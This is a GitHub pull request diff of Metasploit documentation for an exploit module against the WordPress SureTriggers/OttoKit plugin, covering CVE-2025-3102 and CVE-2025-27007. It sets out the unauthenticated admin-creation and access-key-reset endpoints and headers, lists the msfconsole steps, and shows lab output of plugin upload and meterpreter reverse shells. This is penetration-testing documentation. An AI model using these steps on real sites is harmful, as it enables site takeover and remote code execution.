Skip to content

Add CVE-2025-27007 in existing exploit(multi/http/wp_suretriggers_auth_bypass) module #20187

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Add CVE-2025-27007 in existing exploit(multi/http/wp_suretriggers_auth_bypass) module #20187

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
224 changes: 136 additions & 88 deletions documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,17 +1,28 @@
## Vulnerable Application

This Metasploit module exploits an administrative user creation vulnerability in the
WordPress SureTriggers plugin, versions <= 1.0.78 (CVE-2025-3102).
The plugin exposes an unauthenticated REST endpoint (`automation/action`) that allows
bypassing permission checks to create a new administrator account.
This Metasploit module exploits administrative user creation vulnerabilities in the
WordPress SureTriggers/OttoKit plugin:

To replicate a vulnerable environment for testing:
* **CVE-2025-3102** (≤ 1.0.78): unauthenticated admin creation via the `automation/action`
REST endpoint with an empty `St-Authorization: Bearer ` header.
* **CVE-2025-27007** (≤ 1.0.82): unauthenticated reset of the access key via the `connection/create-wp-connection` endpoint,
followed by admin creation using `St-Authorization: Bearer <NEW_KEY>`.

1. Install WordPress using the provided Docker Compose configuration.
2. Download and install the SureTriggers plugin v1.0.78:
[https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip](https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip)
3. Verify that the plugin is activated and accessible on the local network.
4. No further configuration is required; vulnerability is present immediately upon activation.
### To replicate vulnerable environments

1. **SureTriggers v1.0.78 (CVE-2025-3102)**

* Download & install plugin v1.0.78:
`https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip`
* No additional setup is required; the bypass works immediately upon activation.

2. **SureTriggers v1.0.82 (CVE-2025-27007)**

* Download & install plugin v1.0.82:
`https://downloads.wordpress.org/plugin/suretriggers.1.0.82.zip`
* No secret key is needed; the exploit will reset it to the specified value.

Both scenarios can be deployed via Docker Compose.

## Docker Compose Configuration

Expand Down Expand Up @@ -62,131 +73,168 @@ post_max_size = 64M
```bash
docker-compose up -d
```

2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555)
3. Confirm that SureTriggers v1.0.78 is active under **Plugins**
4. Launch `msfconsole`
5. Load the module:
2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555).
3. Confirm the targeted SureTriggers version is active under **Plugins**.
4. In `msfconsole`:

```bash
use exploit/multi/http/wp_suretriggers_auth_bypass
```

6. Set `RHOSTS` to the target IP
7. Optionally set `ST_AUTH` if you have an existing key
8. Configure `WP_USER`, `WP_PASS`, `WP_EMAIL`
9. Execute the exploit with `run`

## Options

* **RHOSTS**: Target IP address or hostname where WordPress is running.
* **TARGETURI**: Base path to the WordPress installation (default is `/`).
* **WP_USER**, **WP_PASS**, **WP_EMAIL**: Credentials for the new administrator account that the exploit will create.
By default these are randomly generated but you can set them to values of your choice, for example:

```bash
set RHOSTS 127.0.0.1
set TARGETURI /
set WP_USER eviladmin
set WP_PASS Str0ngP@ss!
set WP_EMAIL [email protected]
```

* **ST_AUTH**: *(Optional)* If you have the plugin’s secret key (used in the `st_authorization` header),
you can provide it here to authenticate the REST request.
If left empty the module will send an empty header value, which still works on versions <= 1.0.78.

## Scenarios
## Options

### Successful Exploitation Against SureTriggers v1.0.78
* **WP_USER**, **WP_PASS**, **WP_EMAIL**: New administrator credentials (random by default).
* **ST_AUTH**: *(Optional)* Value for `St-Authorization` header (used by CVE-2025-3102; default empty).
* **ACCESS_KEY**: *(Optional)* Key to reset for CVE-2025-27007 (random by default).
* **ACTION**: Exploit to perform:

**Setup:**
* `CVE-2025-3102`
* `CVE-2025-27007`

* Local WordPress instance with SureTriggers v1.0.78
* Metasploit Framework
## Scenarios

**Steps:**
### CVE-2025-3102: Empty Bearer Admin Creation

1. Start `msfconsole`
1. Ensure SureTriggers v1.0.78 is active.
2. In `msfconsole`, set:

2. Load the module:
```bash
use exploit/multi/http/wp_suretriggers_auth_bypass
set ACTION CVE-2025-3102
```
3. Configure:
3. Run the module: it will send an empty `St-Authorization: Bearer ` header to `/wp-json/sure-triggers/v1/automation/action`.
4. New administrator is created; payload is uploaded and executed.

### CVE-2025-27007: Reset Access Key & Admin Creation

1. Ensure SureTriggers v1.0.82 is active.
2. In `msfconsole`, set:

```bash
set RHOSTS 127.0.0.1
set TARGETURI /
set WP_USER eviladmin
set WP_PASS Str0ngP@ss!
run
set ACTION CVE-2025-27007
```
3. Run the module: it will call `/wp-json/sure-triggers/v1/connection/create-wp-connection` to reset the key, then use
`St-Authorization: Bearer mynewkey123` against `/wp-json/sure-triggers/v1/automation/action`.
4. New administrator is created; payload is uploaded and executed.

**Expected Results**:

### Expected Results (CVE-2025-3102)

With `php/meterpreter/reverse_tcp`:

```plaintext
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected WordPress version: 6.3.2
[+] Detected suretriggers plugin version: 1.0.78
[+] The target appears to be vulnerable.
[*] Attempting to create administrator user via auth bypass...
[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
[*] Detected WordPress version: 6.8.1
[+] The target appears to be vulnerable. Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102)
[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty)
[+] Admin created: zGrsYO:8XL0pZKjN7pc
[*] Uploading malicious plugin for code execution...
[*] Executing payload at /wp-content/plugins/wp_p2ash/ajax_efdsa.php...
[*] Sending stage (40004 bytes) to 172.27.0.2
[+] Deleted ajax_efdsa.php
[+] Deleted wp_p2ash.php
[+] Deleted ../wp_p2ash
[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.27.0.2:33924) at 2025-05-07 17:22:49 +0200
[*] Executing payload at /wp-content/plugins/wp_63rkh/ajax_fybgc.php...
[*] Sending stage (40004 bytes) to 172.27.0.3
[+] Deleted ajax_fybgc.php
[+] Deleted wp_63rkh.php
[+] Deleted ../wp_63rkh
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:51410) at 2025-05-14 19:00:30 +0200

meterpreter > sysinfo
Computer : a6e792b1c252
OS : Linux a6e792b1c252 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
Computer : 396e678f2510
OS : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
Meterpreter : php/linux
```

With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

```plaintext
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > show targets
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
target => 1
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected WordPress version: 6.8.1
[+] The target appears to be vulnerable. Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102)
[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty)
[+] Admin created: zGrsYO:8XL0pZKjN7pc
[*] Uploading malicious plugin for code execution...
[*] Executing payload at /wp-content/plugins/wp_exf15/ajax_tpfd9.php...
[*] Sending stage (3045380 bytes) to 172.27.0.3
[+] Deleted ajax_tpfd9.php
[+] Deleted wp_exf15.php
[+] Deleted ../wp_exf15
[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:53324) at 2025-05-14 19:02:06 +0200

meterpreter > sysinfo
Computer : 172.27.0.3
OS : Debian 12.10 (Linux 6.14.2-2-cachyos)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```

Exploit targets:
=================
### Expected Results (CVE-2025-27007)

Id Name
-- ----
=> 0 PHP In-Memory
1 Unix In-Memory
2 Windows In-Memory
With `php/meterpreter/reverse_tcp`:

```plaintext
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-27007
action => CVE-2025-27007
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected WordPress version: 6.8.1
[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007)
[*] CVE-2025-27007: reset access key & create admin
[*] Resetting access key
[+] Access key reset successful
[+] Admin created: pAEaR3:98TCYzILsdXt
[*] Uploading malicious plugin for code execution...
[*] Executing payload at /wp-content/plugins/wp_14slj/ajax_drh8b.php...
[*] Sending stage (40004 bytes) to 172.27.0.3
[+] Deleted ajax_drh8b.php
[+] Deleted wp_14slj.php
[+] Deleted ../wp_14slj
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:42464) at 2025-05-14 19:05:06 +0200

meterpreter > sysinfo
Computer : 396e678f2510
OS : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
Meterpreter : php/linux
```

With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

```plaintext
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
target => 1
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected WordPress version: 6.3.2
[+] Detected suretriggers plugin version: 1.0.78
[+] The target appears to be vulnerable.
[*] Attempting to create administrator user via auth bypass...
[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
[*] Detected WordPress version: 6.8.1
[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007)
[*] CVE-2025-27007: reset access key & create admin
[*] Resetting access key
[+] Access key reset successful
[+] Admin created: pAEaR3:98TCYzILsdXt
[*] Uploading malicious plugin for code execution...
[*] Executing payload at /wp-content/plugins/wp_ppqii/ajax_cqc8l.php...
[*] Sending stage (3045380 bytes) to 172.27.0.2
[+] Deleted ajax_cqc8l.php
[+] Deleted wp_ppqii.php
[+] Deleted ../wp_ppqii
[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.2:54238) at 2025-05-07 17:24:10 +0200
[*] Executing payload at /wp-content/plugins/wp_c7ziw/ajax_a9arm.php...
[*] Sending stage (3045380 bytes) to 172.27.0.3
[+] Deleted ajax_a9arm.php
[+] Deleted wp_c7ziw.php
[+] Deleted ../wp_c7ziw
[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:54362) at 2025-05-14 19:06:04 +0200

meterpreter > sysinfo
Computer : 172.27.0.2
OS : Debian 11.8 (Linux 6.14.2-2-cachyos)
Computer : 172.27.0.3
OS : Debian 12.10 (Linux 6.14.2-2-cachyos)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
Expand Down
Loading
Loading